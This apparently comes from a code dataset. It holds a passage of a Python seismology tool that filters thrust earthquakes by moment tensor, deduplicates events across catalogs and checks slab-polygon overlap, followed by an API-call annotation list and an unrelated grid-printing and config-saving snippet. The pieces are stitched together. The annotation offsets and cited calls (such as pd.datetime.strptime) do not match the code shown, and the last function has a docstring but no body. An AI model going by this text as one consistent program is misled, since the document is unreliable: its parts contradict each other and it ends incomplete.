    # Depending on which MT info are provided, filters non-thrust, shallow events
    if 'Ndip' in shallow_data.columns:
        # Principal-axis criteria: steep T axis, shallow-dipping N axis.
        thrust_rake = (shallow_data.Tpl>50) & (shallow_data.Ndip<=30)
    else:
        # Nodal-plane criteria: both rakes within the thrust range (30-150).
        thrust_rake = ((shallow_data.R1>30) & (shallow_data.R2>30)
                       & (shallow_data.R1<150) & (shallow_data.R2<150))
    shallow_data = shallow_data[thrust_rake]
    # Includes shallow data without MT info (1) - comment out next line for (2)
    filtered = pd.concat([deep_data, shallow_data, dfn],sort=True)
    # Only includes shallow thrust events (2) - uncomment line below for (2) and comment necessary lines above
    # filtered = pd.concat([deep_data, shallow_data],sort=True)
    # Rearranges columns / filters out unecessary columns
    filtered=filtered[['lat','lon','depth','unc','ID','etype','mag','time',
                       'Paz','Ppl','Taz','Tpl','S1','D1','R1','S2','D2','R2','mlon','mlat','mdep']]
    return filtered
def make_moment_tensor(mrr,mtt,mpp,mrt,mrp,mtp): #r,t,p = x,y,z
    '''Used in m_to_planes below. Makes a moment tensor object from moment tensor components'''
    components = (mrr, mtt, mpp, mrt, mrp, mtp)
    return obspy.imaging.beachball.MomentTensor(*components, 1)
def m_to_planes(mrr,mtt,mpp,mrt,mrp,mtp,n):
    '''Takes a moment tensor and calculates the P, N, and T axes and nodal plane information.
    Used in moment_calc below. Returns one of these values as specified by input (n).
    The integer input specifies which index of the array of outputs to return:
    [Pstrike, Pdip, Tstrike, Tdip, S1, D1, R1, S2, D2, R2]. '''
    tensor = make_moment_tensor(mrr, mtt, mpp, mrt, mrp, mtp)
    # obspy helpers (lowercase names): mt2axes -> (T, N, P) axes,
    # mt2plane -> preferred nodal plane, aux_plane -> auxiliary plane.
    principal_axes = obspy.imaging.beachball.mt2axes(tensor)
    plane1 = obspy.imaging.beachball.mt2plane(tensor)
    plane2 = obspy.imaging.beachball.aux_plane(plane1.strike, plane1.dip, plane1.rake)
    values = [principal_axes[2].strike, principal_axes[2].dip,   # P axis
              principal_axes[0].strike, principal_axes[0].dip,   # T axis
              plane1.strike, plane1.dip, plane1.rake,            # plane 1
              plane2[0], plane2[1], plane2[2]]                   # plane 2
    return values[n]
def moment_calc(df, args, seismo_thick,slabname):
    ''' Creates and appends columns with Principal Axis and Nodal Plane information.
        Used in makeframe below. Takes moment tensor information from input dataframe
        columns and creates 11 new columns with information used to distinguish between thrust
        and non-thrust earthquakes.
        Arguments:  df - dataframe with mt information in the form mrr,mtt,mpp,mrt,mrp,mtp
                    args - input arguments provided from command line arguments
        Returns:    df - dataframe with mt information in the form Paz,Ppl,Taz,Tpl,S1,D1,R1,S2,D2,R2
    '''
    # Only calculates MT info where it exists in EQ datasets
    df = inbounds(args, df, slabname)
    dfm = df[np.isfinite(df['mrr'])]
    dfn = df[df['mrr'].isnull()]
    try:
        # One derived column per selector index passed to m_to_planes;
        # this replaces ten near-identical apply() calls.
        mt_columns = ['Paz','Ppl','Taz','Tpl','S1','D1','R1','S2','D2','R2']
        for idx, col in enumerate(mt_columns):
            # n=idx binds the loop value at definition time (avoids the
            # late-binding closure pitfall inside the loop).
            dfm[col] = dfm.apply(
                lambda row, n=idx: m_to_planes(row['mrr'], row['mtt'], row['mpp'],
                                               row['mrt'], row['mrp'], row['mtp'], n),
                axis=1)
        # Concatenates events with and without MT info
        #dfm = cmtfilter(dfm,seismo_thick)
        df = pd.concat([dfm,dfn],sort=True)
        # Rearranges columns and returns
        if 'mlon' in df.columns:
            df = df[['lat','lon','depth','unc','ID','etype','mag','time',
                     'Paz','Ppl','Taz','Tpl','S1','D1','R1','S2','D2','R2','mlon','mlat','mdep']]
        else:
            df = df[['lat','lon','depth','unc','ID','etype','mag','time',
                     'Paz','Ppl','Taz','Tpl','S1','D1','R1','S2','D2','R2']]
            df['mlon'] = df['lon'].values*1.0
            df['mlat'] = df['lat'].values*1.0
            df['mdep'] = df['depth'].values*1.0
        return df
    except Exception:
        # if exception is caught, try to return only events without MT info
        try:
            if len(dfm) == 0:
                return dfn
        except Exception:
            print('Where moment tensor information is available, columns \
must be labeled: mrr,mpp,mtt,mrp,mrt,mtp')
def ymdhmsparse(input_file):
    '''Parses Yr Mo Day Hr Min Sec into one datetime object when provided in distinguished columns.
    Used in makeframe below. Returns a new dataframe with parsed datetimes.

    BUG FIX: the original combined the columns with pd.datetime.strptime via
    read_csv's date_parser; pd.datetime was removed in pandas 2.0.  The
    components are now combined with pd.to_datetime after reading, producing
    the same layout: 'time' first, then lat,lon,depth,mag.
    '''
    cols = ['year','month','day','hour','min','sec','lat','lon','depth','mag']
    data = pd.read_csv(input_file, usecols=cols)
    # pd.to_datetime expects the component columns named minute/second.
    parts = data[['year','month','day','hour','min','sec']].rename(
        columns={'min': 'minute', 'sec': 'second'})
    time = pd.to_datetime(parts)
    data = data.drop(columns=['year','month','day','hour','min','sec'])
    data.insert(0, 'time', time)
    return data
def raiseUnc(x):
    ''' Raises unreasonably low uncertainties for earthquakes to a value greater
        than that of average active source data points (which is 5 km). '''
    # Clamp to a floor of 6 km; values already at or above it pass through.
    return max(x, 6)
def makeframe(data, fcsv, event_type, uncertainty, args, seismo_thick,slabname):
    ''' Arguments: data - semi-filtered data frame to be filtered more and written to file
        fcsv - filename of output file
        event_type - kind of data i.e. BA, EQ, ER, TO etc
        uncertainty - unc value provided in command line or set by default for etype
        args - input arguments provided from command line arguments
        Returns: data - fully filtered dataset to be written to output file '''
    # Parses Yr Mo Day Hr Min Sec into one datetime object when provided in distinguished columns
    if 'year' in data.columns and 'sec' in data.columns and 'mag' in data.columns:
        data = ymdhmsparse(fcsv)
    # If ISC-GEM data is provided, high quality, low uncertainties are included in place of
    # the default values assigned in s2d.py main method.
    if 'unc' in data.columns and 'q' in data.columns:
        try:
            # NOTE(review): the guard checks for a column named 'q' but the
            # filter reads data.uq -- confirm which label the catalog uses.
            data = data[(data.uq != 'C') & (data.unc < uncertainty)]
        except:
            print ('When adding a file with uncertainty quality, the column \
representing that quality must be labeled as uq')
    # uses OG uncertainties where provided. Raises them if they are unreasonably low
    elif 'unc' in data.columns:
        uncert = data['unc'].values
        try:
            # NOTE(review): uncert[1] probes the second row only and raises
            # IndexError for single-row files (caught below) -- confirm intent.
            if isnan(uncert[1]):
                data['unc'] = uncertainty
            elif event_type == 'EQ':
                data['unc'] = data.apply(lambda row: raiseUnc(row['unc']),axis=1)
            else:
                pass
        except:
            data['unc'] = uncertainty
    # If no uncertainty column is included, the one provided in command line arguments is
    # used to add a new column to the data, alternatively, the default value assigned in s2d.py is used
    else:
        data['unc'] = uncertainty
    # Silence SettingWithCopy warnings from the column assignments below.
    pd.options.mode.chained_assignment = None
    # A new column marking the event type is added to the data. Everything is cast as a float
    data['etype'] = event_type
    data = castfloats(data)
    # Calculates moment tensor info where applicable and removes shallow, non-thrust events
    if 'mrr' in data.columns:
        data = moment_calc(data, args, seismo_thick,slabname)
    elif 'time' in data.columns and 'mag' in data.columns:
        data = data[['lat','lon','depth','unc','ID','etype','mag','time']]
    else:
        pass
    return data
##########################################################################################################
#The following serves to create a rough plot of the data types compiled with s2d.py.
##########################################################################################################
def plot_map(lons, lats, c, legend_label, projection='mill',
             llcrnrlat=-80, urcrnrlat=90, llcrnrlon=-180, urcrnrlon=180, resolution='i'):
    ''' Optional Arguments: projection - map projection, default set as 'mill'
                            llcrnrlat - lower left corner latitude value, default is -80
                            urcrnrlat - upper right corner latitude value, default is 90
                            llcrnrlon - lower left corner longitude value, default is -180
                            urcrnrlon - upper right corner longitude value, default is 180
                            resolution - the resolution of the plot, default is 'i'
        Required Arguments: lons - list of longitude values to be plotted
                            lats - list of latitude values to be plotted
                            c - the color of the points to be plotted
                            legend_label - how this set of points will be labeled on the legend
        Returns:            m - a basemap object defined by input bounds with input points included '''
    # NOTE(review): Basemap is required here but its import is commented out
    # at the top of this file -- re-enable
    # `from mpl_toolkits.basemap import Basemap` before calling this function.
    # Creates a basic plot of a series of lat,lon points over a defined region
    m = Basemap(projection=projection, llcrnrlat=llcrnrlat, urcrnrlat=urcrnrlat,
                llcrnrlon=llcrnrlon, urcrnrlon=urcrnrlon, resolution=resolution)
    m.drawcoastlines()
    m.drawmapboundary()
    m.drawcountries()
    m.etopo()
    # Meridians/parallels every 5 degrees, labeled on bottom/left edges only.
    m.drawmeridians(np.arange(llcrnrlon, urcrnrlon, 5), labels=[0,0,0,1], fontsize=10)
    m.drawparallels(np.arange(llcrnrlat, urcrnrlat, 5), labels=[1,0,0,0], fontsize=10)
    x,y = m(lons, lats)
    m.scatter(x, y, color=c, label=legend_label, marker='o', edgecolor='none', s=10)
    return m
def datelinecross(x):
    '''Converts negative longitudes to their positive equivalent for the sake of plotting.'''
    # NOTE: this redefines the earlier datelinecross with identical behavior.
    return x if x >= 0 else x + 360
##############################################################################################
#Everything below this point serves the purpose of identifying and
#eliminating duplicate events between multiple earthquake catalog entries.
##############################################################################################
class Earthquake:
    '''Creates an earthquake object from which event information can be extracted'''

    def __init__(self, time, coords, depth, lat, lon, mag, catalog):
        """Store one event's origin time, epicenter pair, hypocenter
        coordinates, magnitude, and source catalog name."""
        self.time, self.coords, self.depth = time, coords, depth
        self.lat, self.lon = lat, lon
        self.mag, self.catalog = mag, catalog
def getvals(row):
    '''Gathers time, lat, lon, depth, mag, information from row in dataframe.'''
    time, lat, lon = row['time'], row['lat'], row['lon']
    depth, mag = row['depth'], row['mag']
    # Epicenter as a (lat, lon) pair for distance calculations.
    return time, (lat, lon), depth, lat, lon, mag
def boundtrim(cat1, cat2):
    ''' Arguments: cat1 - an earthquake catalog to be compared with cat2
        cat2 - an earthquake catalog to be compared to cat1
        Returns: cat1, cat2 - trimmed earthquake catalogs that only extend across bounds
        where they both exist. Reduces processing time
    '''
    # Lat/lon extents of both catalogs.
    lo1, lo2 = cat1['lon'].min(), cat2['lon'].min()
    la1, la2 = cat1['lat'].min(), cat2['lat'].min()
    hi1, hi2 = cat1['lon'].max(), cat2['lon'].max()
    ha1, ha2 = cat1['lat'].max(), cat2['lat'].max()
    # Detect catalogs that appear to straddle the dateline: a max lon in
    # (0, 180), a min lon in (-180, 0), and a lon span over 180 degrees.
    # In that case the simple box trim would be wrong, so skip it.
    west = (0 < hi1 < 180) or (0 < hi2 < 180)
    east = (-180 < lo1 < 0) or (-180 < lo2 < 0)
    wide = abs(lo1 - hi1) > 180 or abs(lo2 - hi2) > 180
    if not (west and east and wide):
        # Clip each catalog to the other's lon and lat extent.
        cat1 = cat1[(cat1.lon >= lo2) & (cat1.lon <= hi2)]
        cat2 = cat2[(cat2.lon >= lo1) & (cat2.lon <= hi1)]
        cat1 = cat1[(cat1.lat >= la2) & (cat1.lat <= ha2)]
        cat2 = cat2[(cat2.lat >= la1) & (cat2.lat <= ha1)]
    return cat1, cat2
def timetrim(cat1, cat2):
    ''' Arguments:  cat1 - an earthquake catalog to be compared with cat2
                    cat2 - an earthquake catalog to be compared to cat1
    Returns: cat1, cat2 - trimmed earthquake catalogs that only extend across time
                          frames where they both exist. Reduces processing time
    '''
    # Coerce both 'time' columns to datetimes before comparing ranges
    for cat in (cat1, cat2):
        cat['time'] = pd.to_datetime(cat['time'])
    lo1, hi1 = cat1['time'].min(), cat1['time'].max()
    lo2, hi2 = cat2['time'].min(), cat2['time'].max()
    # Keep only events inside the other catalog's [min, max] time window
    cat1 = cat1[(cat1.time >= lo2) & (cat1.time <= hi2)]
    cat2 = cat2[(cat2.time >= lo1) & (cat2.time <= hi1)]
    return cat1, cat2
def earthquake_string(eqo):
    ''' Puts earthquake information into a string to be written or printed
    Arguments:  eqo - earthquake object
    Returns:  eqos - a string of information stored in earthquake object input argument '''
    parts = [str(eqo.lat), str(eqo.lon), str(eqo.depth),
             str(eqo.mag), str(eqo.time), eqo.catalog]
    return ','.join(parts)
def find_closest(eqo, eqm1, eqm2):
    '''Determines which of two potential matches in one catalog is closer to an event in another.
    Arguments:  eqo - earthquake event in first catalog that matches two events in the second
                eqm1 - the first event in the second catalog that matches eqo
                eqm2 - the second event in the second catalog that matches eqo
    Returns:  closest - the closest event weighting time first, then distance, then magnitude '''
    # Make the user aware that more than one candidate match exists
    print ('-------------------------------------- lat %s lon %s depth %s mag %s time \
    %s catlog' % (',',',',',',',',','))
    print ('There is more than one match for event: %s' % earthquake_string(eqo))
    print ('event1: %s' % earthquake_string(eqm1))
    print ('event2: %s' % earthquake_string(eqm2))
    # 3-D separation of eqo from each candidate: great-circle arc (km)
    # combined with the depth difference via the hypotenuse.
    darc1 = geodesic(eqo.coords, eqm1.coords).meters/1000
    darc2 = geodesic(eqo.coords, eqm2.coords).meters/1000
    dh1 = abs(eqo.depth - eqm1.depth)
    dh2 = abs(eqo.depth - eqm2.depth)
    dist1 = sqrt(darc1*darc1 + dh1*dh1)
    dist2 = sqrt(darc2*darc2 + dh2*dh2)
    # Time and magnitude differences between eqo and each candidate
    dtime1 = abs(eqo.time - eqm1.time)
    dtime2 = abs(eqo.time - eqm2.time)
    dmag1 = abs(eqo.mag - eqm1.mag)
    dmag2 = abs(eqo.mag - eqm2.mag)
    # Pick the closer match, comparing time first, then distance, then magnitude.
    # (Reaching a later branch implies the earlier criteria were tied.)
    if dtime1 < dtime2:
        closest = eqm1
    elif dtime2 < dtime1:
        closest = eqm2
    elif dist1 < dist2:
        closest = eqm1
    elif dist2 < dist1:
        # BUG FIX: this branch previously selected eqm1, so the farther
        # event won the distance tie-break.
        closest = eqm2
    elif dmag1 < dmag2:
        # BUG FIX: the magnitude tie-breaks previously required
        # dmag1 == dmag2 AND dmag1 < dmag2 simultaneously, which can never
        # be true, making both branches unreachable.
        closest = eqm1
    elif dmag2 < dmag1:
        closest = eqm2
    # If all things are equal, the first event is chosen as a match by default
    else:
        print ('The two events are equidistant to the match in time, space, and magnitude.\
            The second event was therefore determined independent.')
        closest = eqm1
    # BUG FIX: this report sat after an unconditional return and never ran.
    print ('>>>>closest event: %s' % earthquake_string(closest))
    return closest
def removematches(dfo, dfm):
    '''Eliminates events in dfo (dataframe) that are found in dfm (dataframe) '''
    # A row counts as a match only when all five attributes appear in dfm.
    matched = (dfo.time.isin(dfm.time)
               & dfo.lat.isin(dfm.lat)
               & dfo.lon.isin(dfm.lon)
               & dfo.mag.isin(dfm.mag)
               & dfo.depth.isin(dfm.depth))
    return dfo[~matched]
def rid_matches(cat1, cat2, name1, name2):
    ''' Compares two catalogs, identifies and removes matching events from cat2.
    Arguments:  cat1 - the first catalog (dataframe), no events are removed from this catalog
                cat2 - the second catalog (dataframe), events in this catalog that are close
                        in space, time, and magnitude to those in cat1 are filtered out
                name1 - the name of the first catalog, used for printing/bookeeping purposes
                name2 - the name of the second catalog, used for printing/bookeeping purposes
    Returns: df - a filtered version of cat2 without events that match those in cat1 '''
    # Matching criteria: events within 30 s, 100 km, and 0.5 magnitude units
    # of each other are treated as duplicates.
    tdelta = 30
    distdelta = 100
    magdelta = 0.5
    # Ensure all times are datetime objects, then trim each catalog to the
    # other's bounds and time window to shrink the O(n*m) comparison below.
    cat1['time'] = pd.to_datetime(cat1['time'])
    cat2['time'] = pd.to_datetime(cat2['time'])
    cat1c,cat2c = timetrim(cat1, cat2)
    cat1c,cat2c = boundtrim(cat1c, cat2c)
    # Short names used for bookkeeping output; fall back to stripping the
    # extension when the name cannot be sliced.
    try:
        name1w = name1[-10:] #this doesn't make sense, and seems to chop the file name inappropriately - will have to resolve this later.
        name2w = name2[-10:]
    except TypeError:
        # BUG FIX: narrowed from a bare `except:` so unrelated errors
        # (KeyboardInterrupt, NameError, ...) are no longer swallowed.
        name1w = name1[:-4]
        name2w = name2[:-4]
    matches = pd.DataFrame(columns = ['lat','lon','depth','mag','time','catalog'])
    count = 0
    # Compares each event in cat2 to each event in cat1
    for index,row in cat1c.iterrows():
        n = 0
        # Earthquake info for the cat1 event
        time1, ep1, depth1, lat1, lon1, mag1 = getvals(row)
        eq1 = Earthquake(time1, ep1, depth1, lat1, lon1, mag1, name1w)
        for index, r in cat2c.iterrows():
            # Earthquake info for the cat2 event
            time2, ep2, depth2, lat2, lon2, mag2 = getvals(r)
            eq2 = Earthquake(time2, ep2, depth2, lat2, lon2, mag2, name2w)
            # If events are close in time, space, and magnitude record the
            # cat2 event as a match.  NOTE: geodesic replaces the removed
            # geopy `vincenty` API and matches the distance function that
            # find_closest already uses.
            if abs(time1-time2) < datetime.timedelta(seconds = tdelta):
                if geodesic(ep1,ep2).meters/1000 <= distdelta:
                    if abs(mag1-mag2) < magdelta:
                        # If there is already a match for this event, keep
                        # the closest; it is compared against third, fourth
                        # matches etc if they exist.
                        if n >= 1:
                            match = find_closest(eq1, match, eq2)
                            n += 1
                        if n == 0:
                            match = eq2
                            n += 1
        # Add the matching pair to the bookkeeping dataframe
        # (BUG FIX: removed a no-op bare tuple expression that sat here.)
        if n > 0:
            matches.loc[len(matches)+1] = [lat1, lon1, depth1, mag1, time1, name1w]
            matches.loc[len(matches)+1] = [match.lat, match.lon, match.depth, match.mag,
                                            match.time, name2w]
            count += 1
    # Write matches to matching file
    matchfile = name1w + name2w + '-matches.csv'
    # Remove matches from cat2
    df = removematches(cat2, matches)
    # Print general results to console
    print ('%i matches were found between the catalogs: %s and %s.' % (count, name1, name2))
    if count > 0:
        with open(matchfile,'w') as f:
            matches.to_csv(f, header=True, index=False, float_format='%0.4f')
        print ('The pairs can be found in the file: ** %s **, which has been written added to the current directory.' % (name1w + name2w + '-matches.csv'))
        print ('Based on the order of entry, in the instance of duplicate events, the entries in ** %s ** were added to the slab file while the entries in ** %s ** were not added.' % (name1, name2))
    # Return filtered catalog to be written to output file
    return df
def rectangleIntersectsPolygon(x1,x2,y1,y2):
    '''Identify which slab polygon(s) overlap the query rectangle.

    Arguments:  x1, x2 - west/east longitudes of the rectangle
                y1, y2 - south/north latitudes of the rectangle
    Returns:  slab - list of overlapping slab names; or, if several overlap,
                     the single name the user selects interactively.
    '''
    ####################################
    #written by <NAME>, 8/4/2016#
    ####################################
    def is_odd(num):
        # Odd columns hold longitudes, even columns latitudes (see below)
        return num & 0x1
    #create polygon from input rectangle
    rect = Polygon([(x1,y2),(x2,y2),(x2,y1),(x1,y1)])
    #read in slab boundaries
    slabfile = 'slab_polygons.txt'
    filerows = []
    with open(slabfile) as csvfile:
        reader = csv.reader(csvfile, delimiter=',')
        for row in reader:
            filerows.append(row)
    # (the `with` block closes the file; the old explicit close() was redundant)
    #loop through the slabnames and slabboundaries by row to define each slab polygon
    #then verify whether the input rectangle overlaps any of the defined slabs
    slab = []
    for i in range(len(filerows)-1):
        lats = []
        lons = []
        slabname = filerows[i][0]
        # BUG FIX: removed `slabbounds.append(slabbounds)`, which appended
        # the list to itself and was never read.
        for j in range(1,(len(filerows[i][:]))):
            val = float(filerows[i][j])
            if is_odd(j):
                lons.append(val)
            else:
                lats.append(val)
        # BUG FIX: shapely's overlaps() needs a geometry, not a raw
        # coordinate list, so wrap the boundary points in a Polygon.
        # NOTE(review): overlaps() is False when the rectangle lies entirely
        # inside a slab polygon; intersects() may be intended — confirm.
        poly = Polygon(list(zip(lons,lats)))
        if rect.overlaps(poly):
            slab.append(slabname)
    #if the input rectangle does not overlap with just one slab, let the user know
    if len(slab) == 0:
        print ('The input boundaries do not overlap any slabs. Please try again.')
    elif len(slab) > 1:
        # BUG FIX: raw_input is Python 2 only, and the prompt now lists the
        # matching slab names instead of the last polygon's longitudes.
        response = input('You have selected multiple slabs. Which slab would you like to model?: ' + str(slab) + ' Please enter a string: ')
        slab = response
    return slab
| [
"pandas.read_csv",
"pandas.datetime.strptime",
"numpy.isfinite",
"datetime.timedelta",
"numpy.arange",
"pandas.to_datetime",
"datetime.datetime",
"matplotlib.path.Path",
"numpy.dot",
"fnmatch.fnmatch",
"numpy.vstack",
"pandas.DataFrame",
"csv.reader",
"numpy.size",
"os.path.isfile",
"n... | [((12234, 12263), 'datetime.datetime', 'datetime.datetime', (['(1900)', '(1)', '(1)'], {}), '(1900, 1, 1)\n', (12251, 12263), False, 'import datetime\n'), ((12274, 12300), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (12298, 12300), False, 'import datetime\n'), ((15450, 15469), 'numpy.size', 'np.size', (['slabbounds'], {}), '(slabbounds)\n', (15457, 15469), True, 'import numpy as np\n'), ((17029, 17049), 'numpy.zeros', 'np.zeros', (['[boxes, 4]'], {}), '([boxes, 4])\n', (17037, 17049), True, 'import numpy as np\n'), ((19042, 19061), 'numpy.size', 'np.size', (['slabbounds'], {}), '(slabbounds)\n', (19049, 19061), True, 'import numpy as np\n'), ((19440, 19453), 'matplotlib.path.Path', 'path.Path', (['xy'], {}), '(xy)\n', (19449, 19453), False, 'from matplotlib import path\n'), ((20769, 20788), 'numpy.size', 'np.size', (['slabbounds'], {}), '(slabbounds)\n', (20776, 20788), True, 'import numpy as np\n'), ((23054, 23106), 'pandas.concat', 'pd.concat', (['[deep_data, shallow_data, dfn]'], {'sort': '(True)'}), '([deep_data, shallow_data, dfn], sort=True)\n', (23063, 23106), True, 'import pandas as pd\n'), ((29568, 29645), 'pandas.read_csv', 'pd.read_csv', (['input_file'], {'parse_dates': 'ymdhms', 'usecols': 'cols', 'date_parser': 'dparse'}), '(input_file, parse_dates=ymdhms, usecols=cols, date_parser=dparse)\n', (29579, 29645), True, 'import pandas as pd\n'), ((37348, 37376), 'pandas.to_datetime', 'pd.to_datetime', (["cat1['time']"], {}), "(cat1['time'])\n", (37362, 37376), True, 'import pandas as pd\n'), ((37396, 37424), 'pandas.to_datetime', 'pd.to_datetime', (["cat2['time']"], {}), "(cat2['time'])\n", (37410, 37424), True, 'import pandas as pd\n'), ((41804, 41832), 'pandas.to_datetime', 'pd.to_datetime', (["cat1['time']"], {}), "(cat1['time'])\n", (41818, 41832), True, 'import pandas as pd\n'), ((41852, 41880), 'pandas.to_datetime', 'pd.to_datetime', (["cat2['time']"], {}), "(cat2['time'])\n", (41866, 41880), True, 'import pandas 
as pd\n'), ((42294, 42365), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['lat', 'lon', 'depth', 'mag', 'time', 'catalog']"}), "(columns=['lat', 'lon', 'depth', 'mag', 'time', 'catalog'])\n", (42306, 42365), True, 'import pandas as pd\n'), ((866, 904), 'datetime.strptime', 'datetime.strptime', (['timestring', 'TIMEFMT'], {}), '(timestring, TIMEFMT)\n', (883, 904), False, 'import datetime\n'), ((9305, 9327), 'numpy.isfinite', 'np.isfinite', (["df['lat']"], {}), "(df['lat'])\n", (9316, 9327), True, 'import numpy as np\n'), ((9341, 9363), 'numpy.isfinite', 'np.isfinite', (["df['lon']"], {}), "(df['lon'])\n", (9352, 9363), True, 'import numpy as np\n'), ((9377, 9401), 'numpy.isfinite', 'np.isfinite', (["df['depth']"], {}), "(df['depth'])\n", (9388, 9401), True, 'import numpy as np\n'), ((9415, 9437), 'numpy.isfinite', 'np.isfinite', (["df['unc']"], {}), "(df['unc'])\n", (9426, 9437), True, 'import numpy as np\n'), ((9775, 9802), 'os.path.isfile', 'os.path.isfile', (['output_file'], {}), '(output_file)\n', (9789, 9802), False, 'import os\n'), ((10077, 10101), 'pandas.read_csv', 'pd.read_csv', (['output_file'], {}), '(output_file)\n', (10088, 10101), True, 'import pandas as pd\n'), ((10116, 10147), 'pandas.concat', 'pd.concat', (['[old, df]'], {'sort': '(True)'}), '([old, df], sort=True)\n', (10125, 10147), True, 'import pandas as pd\n'), ((14487, 14521), 'csv.reader', 'csv.reader', (['csvfile'], {'delimiter': '""","""'}), "(csvfile, delimiter=',')\n", (14497, 14521), False, 'import csv\n'), ((19627, 19651), 'numpy.dot', 'np.dot', (['mask[i]', 'data[i]'], {}), '(mask[i], data[i])\n', (19633, 19651), True, 'import numpy as np\n'), ((22414, 22435), 'numpy.isnan', 'np.isnan', (["data['Paz']"], {}), "(data['Paz'])\n", (22422, 22435), True, 'import numpy as np\n'), ((22495, 22519), 'numpy.isfinite', 'np.isfinite', (["data['Paz']"], {}), "(data['Paz'])\n", (22506, 22519), True, 'import numpy as np\n'), ((25820, 25842), 'numpy.isfinite', 'np.isfinite', (["df['mrr']"], 
{}), "(df['mrr'])\n", (25831, 25842), True, 'import numpy as np\n'), ((28219, 28251), 'pandas.concat', 'pd.concat', (['[dfm, dfn]'], {'sort': '(True)'}), '([dfm, dfn], sort=True)\n', (28228, 28251), True, 'import pandas as pd\n'), ((29433, 29477), 'pandas.datetime.strptime', 'pd.datetime.strptime', (['x', '"""%Y %m %d %H %M %S"""'], {}), "(x, '%Y %m %d %H %M %S')\n", (29453, 29477), True, 'import pandas as pd\n'), ((34188, 34222), 'numpy.arange', 'np.arange', (['llcrnrlon', 'urcrnrlon', '(5)'], {}), '(llcrnrlon, urcrnrlon, 5)\n', (34197, 34222), True, 'import numpy as np\n'), ((34275, 34309), 'numpy.arange', 'np.arange', (['llcrnrlat', 'urcrnrlat', '(5)'], {}), '(llcrnrlat, urcrnrlat, 5)\n', (34284, 34309), True, 'import numpy as np\n'), ((45554, 45588), 'csv.reader', 'csv.reader', (['csvfile'], {'delimiter': '""","""'}), "(csvfile, delimiter=',')\n", (45564, 45588), False, 'import csv\n'), ((4939, 4980), 'pandas.read_csv', 'pd.read_csv', (['input_file'], {'low_memory': '(False)'}), '(input_file, low_memory=False)\n', (4950, 4980), True, 'import pandas as pd\n'), ((5565, 5596), 'numpy.arange', 'np.arange', (['start_ID', 'stop_ID', '(1)'], {}), '(start_ID, stop_ID, 1)\n', (5574, 5596), True, 'import numpy as np\n'), ((7548, 7579), 'numpy.arange', 'np.arange', (['start_ID', 'stop_ID', '(1)'], {}), '(start_ID, stop_ID, 1)\n', (7557, 7579), True, 'import numpy as np\n'), ((11049, 11077), 'pandas.to_datetime', 'pd.to_datetime', (["data['time']"], {}), "(data['time'])\n", (11063, 11077), True, 'import pandas as pd\n'), ((19691, 19727), 'numpy.vstack', 'np.vstack', (['(keepers, points_in_poly)'], {}), '((keepers, points_in_poly))\n', (19700, 19727), True, 'import numpy as np\n'), ((19847, 19870), 'numpy.isnan', 'np.isnan', (['keepers[i][0]'], {}), '(keepers[i][0])\n', (19855, 19870), True, 'import numpy as np\n'), ((39126, 39159), 'geopy.distance.geodesic', 'geodesic', (['eqo.coords', 'eqm1.coords'], {}), '(eqo.coords, eqm1.coords)\n', (39134, 39159), False, 'from 
geopy.distance import geodesic\n'), ((39184, 39217), 'geopy.distance.geodesic', 'geodesic', (['eqo.coords', 'eqm2.coords'], {}), '(eqo.coords, eqm2.coords)\n', (39192, 39217), False, 'from geopy.distance import geodesic\n'), ((952, 990), 'datetime.strptime', 'datetime.strptime', (['timestring', 'DATEFMT'], {}), '(timestring, DATEFMT)\n', (969, 990), False, 'import datetime\n'), ((43130, 43164), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'tdelta'}), '(seconds=tdelta)\n', (43148, 43164), False, 'import datetime\n'), ((6160, 6192), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['row', '"""*global*"""'], {}), "(row, '*global*')\n", (6175, 6192), False, 'import fnmatch\n'), ((11142, 11198), 'pandas.to_datetime', 'pd.to_datetime', (["data['time']"], {'format': '"""%m-%d-%YT%H:%M:%S"""'}), "(data['time'], format='%m-%d-%YT%H:%M:%S')\n", (11156, 11198), True, 'import pandas as pd\n'), ((1050, 1089), 'datetime.strptime', 'datetime.strptime', (['timestring', 'TIMEFMT2'], {}), '(timestring, TIMEFMT2)\n', (1067, 1089), False, 'import datetime\n'), ((11274, 11333), 'pandas.to_datetime', 'pd.to_datetime', (["data['time']"], {'format': '"""%m-%d-%YT%H:%M:%S.%f"""'}), "(data['time'], format='%m-%d-%YT%H:%M:%S.%f')\n", (11288, 11333), True, 'import pandas as pd\n'), ((11651, 11706), 'pandas.to_datetime', 'pd.to_datetime', (["row['time']"], {'format': '"""%m-%d-%YT%H:%M:%S"""'}), "(row['time'], format='%m-%d-%YT%H:%M:%S')\n", (11665, 11706), True, 'import pandas as pd\n'), ((11817, 11875), 'pandas.to_datetime', 'pd.to_datetime', (["row['time']"], {'format': '"""%m-%d-%YT%H:%M:%S.%f"""'}), "(row['time'], format='%m-%d-%YT%H:%M:%S.%f')\n", (11831, 11875), True, 'import pandas as pd\n')] |
import json
def confirm():
    """Placeholder hook; currently just emits a blank line."""
    blank = ""
    print(blank)
# custom function
def rowPrint(xrow=-1, yrow=-1, xpos=-1, ypos=-1, width=9, height=9):
    """Print a width x height grid of 'O' cells with optional 'X' markers.

    xrow  - index of a whole row to fill with X's (-1 disables)
    yrow  - index of a whole column to fill with X's (-1 disables)
    xpos/ypos - column/row of one cell to mark; both must be >= 0
                (fixes a NameError when xpos was given without ypos)
    Fixes: loop variables no longer shadow the builtins `list` and `str`,
    and the row/column marking is done once instead of per-row.
    """
    grid = [["O"] * width for _ in range(height)]
    if yrow != -1:
        for grid_row in grid:       # vertical line: same column in every row
            grid_row[yrow] = "X"
    if xrow != -1:
        grid[xrow] = ["X"] * width  # horizontal line: replace the whole row
    if ypos != -1 and xpos != -1:
        grid[ypos][xpos] = "X"      # single cell marker
    for grid_row in grid:
        # Render each cell with a leading space, matching the old output
        print("".join(" " + cell for cell in grid_row))
#rowPrint(1,2,7,6)
def saveJson(currentJson):
    """Persist the settings dict to config.json, report, and terminate.

    currentJson - JSON-serializable settings dict to write out.
    """
    # Context manager guarantees the file is closed even if dumping fails
    # (the old version used manual open/close).
    with open('config.json', 'w') as configFile:
        configFile.write(json.dumps(currentJson))
    print("Saved settings: ")
    print(currentJson)
    print("Exiting.")
    quit()  # intentionally ends the program after saving
def confSpeed():
    """Prompt for the click-speed multiplier until a valid float is entered.

    Returns the value as a float.  The previous version retried only once
    and crashed with ValueError if the second attempt was also non-numeric.
    """
